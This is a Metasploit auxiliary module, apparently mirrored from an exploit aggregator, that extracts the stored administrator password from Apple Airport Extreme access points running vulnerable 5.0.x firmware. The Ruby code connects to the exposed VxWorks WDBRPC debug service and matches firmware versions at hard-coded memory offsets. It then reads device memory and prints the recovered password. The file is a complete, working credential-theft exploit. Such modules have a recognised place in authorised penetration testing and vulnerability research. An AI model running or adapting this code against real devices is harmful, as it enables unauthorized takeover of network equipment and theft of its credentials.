## https://sploitus.com/exploit?id=PACKETSTORM:180763
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::WDBRPC_Client
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple Airport Extreme Password Extraction (WDBRPC)',
'Description' => %q{
This module can be used to read the stored password of a vulnerable
Apple Airport Extreme access point. Only a small number of firmware versions
have the WDBRPC service running, however the factory configuration was
vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are
susceptible to this issue. Once the password is obtained, the access point
can be managed using the Apple AirPort utility.
},
'Author' => [ 'hdm'],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '66842'],
['URL', 'https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/'],
['US-CERT-VU', '362332']
]
))
end
def run
target = nil
targets = {
"Apple Base Station V5.0.4" => {
:version => 0x0024ee3c,
:password => 0x00380000,
:password_search => 32768,
},
"Apple Base Station V5.0.3" => {
:version => 0x0024e24c,
:password => 0x00380000,
:password_search => 32768,
},
"Apple Base Station V5.0.1" => {
:version => 0x0024b45c,
:password => 0x00fa7500,
:password_search => 16384
}
}
wdbrpc_client_connect
if not @wdbrpc_info[:rt_vers]
print_error("No response to connection request")
return
end
membase = @wdbrpc_info[:rt_membase]
found = false
targets.each_pair do |tname,target|
vers = wdbrpc_client_memread(membase + target[:version], 32).unpack("Z*")[0]
if not (vers and vers.length > 0 and vers == tname)
next
end
found = true
base = membase + target[:password]
off = 0
mtu = @wdbrpc_info[:agent_mtu] - 80
pass = nil
while off < target[:password_search]
buff = wdbrpc_client_memread(base + off, mtu)
pidx = buff.index("WPys")
if pidx
plen = buff[pidx + 8, 4].unpack("V")[0]
pass = buff[pidx + 12, plen].unpack("Z*")[0]
break
end
off += buff.length
end
if pass
print_good("Password for this access point is '#{pass}'")
else
print_error("The password could not be located")
end
break
end
if not found
print_error("No matching fingerprint for this access point")
end
wdbrpc_client_disconnect
end
end